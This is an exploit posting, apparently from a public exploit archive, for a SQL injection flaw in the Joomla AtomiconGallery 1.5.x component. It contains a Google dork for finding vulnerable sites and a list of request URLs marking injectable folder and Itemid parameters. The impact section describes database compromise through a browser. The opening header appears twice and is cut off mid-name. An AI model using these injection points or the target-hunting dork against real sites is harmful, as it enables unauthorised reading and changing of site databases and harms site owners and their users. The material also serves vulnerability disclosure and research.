####################################################################

# Exploit Title : Joomla AtomiconGallery Components 1.5.x SQL Injection
# Author [ Discovered By ] : KingSk ####################################################################

# Exploit Title : Joomla AtomiconGallery Components 1.5.x SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 01/02/2019
# Vendor Homepage : atomicon.nl
# Software Download Link : atomicon.nl/wp-content/uploads/atomicon-gallery.zip
# Software Information Link : atomicon.nl/atomicongallery
# Software Version : 1.5.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_atomicongallery''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description about Software :
***************************
AtomiconGallery is a lightweight database-less gallery and it can be use for Joomla 1.5.x version.

####################################################################

# Impact :
***********
Joomla AtomiconGallery 1.5.x component for Joomla! is

prone to an SQL-injection vulnerability because it fails to sufficiently

sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access

or modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application

and execute arbitrary SQL commands in application`s database.

Further exploitation of this vulnerability may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser.

####################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_atomicongallery&folder=[SQL Injection]

/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=[SQL Injection]

/index.php?option=com_atomicongallery&folder=Sample%20Images&lang=en&Itemid=[SQL Injection]

/index.php?option=com_atomicongallery&folder=Image%20Gallery&Itemid=[SQL Injection]

/index.php?option=com_atomicongallery&folder=[FOLDER-NAME-HERE]&Itemid=[SQL Injection]

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################